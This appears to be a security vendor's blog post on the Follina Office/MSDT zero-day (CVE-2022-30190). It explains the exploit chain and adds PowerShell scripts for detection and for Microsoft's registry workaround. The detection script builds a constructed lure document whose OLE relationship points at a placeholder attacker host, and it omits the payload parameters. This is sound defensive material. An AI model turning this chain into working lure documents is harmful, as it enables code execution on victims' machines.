The internet is abuzz with news of a zero-day remote code execution bug in Microsoft Office

Microsoft now calls it CVE-2022-30190 (the research community nicknamed it Follina)

How does it work then?

The exploit works like this

  • You open a booby-trapped Word document (.doc/.docx, or an .rtf, which the Explorer preview pane can render without you even opening it)
  • The document's relationship data (word/_rels/document.xml.rels inside the file) references a regular-looking https: URL as an external OLE object, and Word fetches that page when the document is opened
  • The fetched HTML file contains "interesting-looking" JavaScript code
  • The JavaScript opens another URL with the unusual scheme ms-msdt: instead of the regular https:
  • ms-msdt: is a proprietary Microsoft URL scheme registered in the Windows registry; opening it launches MSDT (the Microsoft Support Diagnostic Tool, msdt.exe)
  • MSDT is a legitimate Microsoft tool for running troubleshooting packages. Its job is not to run remote code, but it does not properly validate the parameters passed to it in the ms-msdt: URL, so an attacker can smuggle a PowerShell command into them and MSDT runs it
  • That command runs with the privileges of the user who opened the document, with no macro warning or other prompt. Protected View does stop it for files marked as downloaded from the internet, but one click on Enable Editing (or the .rtf preview trick above) removes that protection
  • The chain is triggered by Word fetching the rogue https: URL embedded in the document; the ms-msdt: URL itself sits in the remote HTML, so the document on its own contains no obvious payload
  • What if you have disabled macros (which is now the default in Word)? It makes no difference: this is NOT a macro, so the macro security settings built into Word never come into play
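To see what this chain looks like on disk, here is an added PowerShell triage script (not from the original post, and not a tool the vendor ships). It unpacks a .docx, lists external OLE object relationships that point at http(s) URLs (ordinary hyperlinks are external too and are deliberately not flagged), and checks a saved HTML file for an ms-msdt: reference. The sample document and HTML it writes to a temp folder are constructed stand-ins: the host attacker.invalid and the placeholder ms-msdt: string are not real indicators, and the real payload parameters are omitted.

```powershell
# Added triage example (not the original post's code). Builds a constructed .docx
# and HTML stage in a temp folder, scans them, then cleans up.
Add-Type -AssemblyName System.IO.Compression.FileSystem

$OleRelType = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject'

function Get-ExternalOleTargets {
    param([Parameter(Mandatory)][string]$Path)
    # A .docx is a zip; each XML part's relationships live in a neighbouring *.rels part.
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        foreach ($entry in ($zip.Entries | Where-Object { $_.FullName -like '*.rels' })) {
            $stream = $entry.Open()
            try {
                $reader = [System.IO.StreamReader]::new($stream)
                [xml]$rels = $reader.ReadToEnd()
            } finally { $stream.Dispose() }
            foreach ($rel in @($rels.Relationships.Relationship)) {
                # Hyperlinks are legitimately external; an OLE object fetched over HTTP is not normal.
                if ($rel.TargetMode -eq 'External' -and $rel.Type -eq $OleRelType -and $rel.Target -match '^https?://') {
                    [pscustomobject]@{ Part = $entry.FullName; Id = $rel.Id; Target = $rel.Target }
                }
            }
        }
    } finally { $zip.Dispose() }
}

function Test-MsdtHtml {
    param([Parameter(Mandatory)][string]$Path)
    # The second stage is an HTML page whose script navigates to an ms-msdt: URL.
    $html = Get-Content -Path $Path -Raw
    return [bool]($html -match 'ms-msdt:')
}

# --- Constructed sample (not a real malware sample) ---------------------------
$work = Join-Path ([System.IO.Path]::GetTempPath()) ('msdt-triage-' + [guid]::NewGuid().ToString('N'))
$src  = Join-Path $work 'src'
New-Item -ItemType Directory -Path (Join-Path $src 'word\_rels') -Force | Out-Null
Set-Content -Path (Join-Path $src 'word\document.xml') -Value '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>'
# rId1 is a normal hyperlink; rId2 is the kind of relationship the attack uses (placeholder host).
$relsXml = @"
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="$OleRelType" Target="https://attacker.invalid/stage.html" TargetMode="External"/>
</Relationships>
"@
Set-Content -Path (Join-Path $src 'word\_rels\document.xml.rels') -Value $relsXml
$docx = Join-Path $work 'sample.docx'
[System.IO.Compression.ZipFile]::CreateFromDirectory($src, $docx)

# Constructed stand-in for the fetched HTML; the real URL parameters are deliberately left out.
$stage = Join-Path $work 'stage.html'
Set-Content -Path $stage -Value '<script>window.location.href = "ms-msdt:<parameters omitted>";</script>'

# --- Run the checks ------------------------------------------------------------
Get-ExternalOleTargets -Path $docx | Format-Table -AutoSize
Test-MsdtHtml -Path $stage

Remove-Item -Path $work -Recurse -Force
```

Point Get-ExternalOleTargets at a suspicious attachment and it reports only the OLE relationships that reach out to the internet; the hyperlink relationship that every ordinary document carries is ignored, which keeps the false-positive rate low enough to run across a mailbox export.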

So, what can I do?

Microsoft's workaround is to break the link between the ms-msdt: URL scheme and MSDT.EXE by unregistering the protocol handler, so that Windows no longer knows what to launch for an ms-msdt: URL

From an elevated command prompt, back up the registry key HKEY_CLASSES_ROOT\ms-msdt (if it exists) with reg export and then delete it with reg delete; keep the backup so the handler can be restored with reg import once the security update is installed (Microsoft shipped a fix in the June 2022 Patch Tuesday updates)

Microsoft's official response and workaround are here: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
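The registry workaround above, as an added PowerShell script that is not Microsoft's own code. It wraps the reg.exe commands from Microsoft's guidance (export, delete, import) so the key is backed up before it is removed and can be put back after patching, and it shows what the handler pointed at before the change. It must run in an elevated PowerShell session and it changes the machine it runs on; the backup path under $env:ProgramData is an assumption, change it to suit.

```powershell
# Added example (not Microsoft's script): apply, verify and undo the ms-msdt handler
# workaround. Run elevated; this modifies HKEY_CLASSES_ROOT.
$Key    = 'HKEY_CLASSES_ROOT\ms-msdt'
$Backup = Join-Path $env:ProgramData 'ms-msdt-backup.reg'   # assumed backup location

function Get-MsdtHandlerCommand {
    # What Windows currently launches for an ms-msdt: URL: the (Default) value of shell\open\command.
    $cmdKey = "Registry::$Key\shell\open\command"
    if (Test-Path -Path $cmdKey) { (Get-ItemProperty -Path $cmdKey).'(default)' } else { $null }
}

function Disable-MsdtHandler {
    if (-not (Test-Path -Path "Registry::$Key")) {
        Write-Host 'HKCR\ms-msdt is already absent; nothing to do.'
        return
    }
    # Step 1: export the key so the change can be reversed after the patch is installed.
    reg.exe export $Key $Backup /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Backup to $Backup failed; leaving the key in place." }
    # Step 2: delete the key. With no handler registered, an ms-msdt: URL no longer launches msdt.exe.
    reg.exe delete $Key /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'reg delete failed; are you running as Administrator?' }
}

function Test-MsdtWorkaroundApplied {
    # True when no ms-msdt: handler is registered any more.
    return -not (Test-Path -Path "Registry::$Key")
}

function Restore-MsdtHandler {
    # Undo: re-import the backup once the security update is in place.
    reg.exe import $Backup
    if ($LASTEXITCODE -ne 0) { throw "Import of $Backup failed." }
}

"Handler before: $(Get-MsdtHandlerCommand)"
Disable-MsdtHandler
"Workaround applied: $(Test-MsdtWorkaroundApplied)"
```

Run Restore-MsdtHandler after the June 2022 update is installed; the handler is only worth removing while the unpatched msdt.exe is what it launches.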

Our premium Anti-Virus solution will protect you from this attack, even though it is a zero-day exploit and is not a macro

Mucking around with the registry on any Windows system can be dangerous, so take the backup before you delete anything

If you would like help, or want to discuss our premium security solutions, contact us now for assistance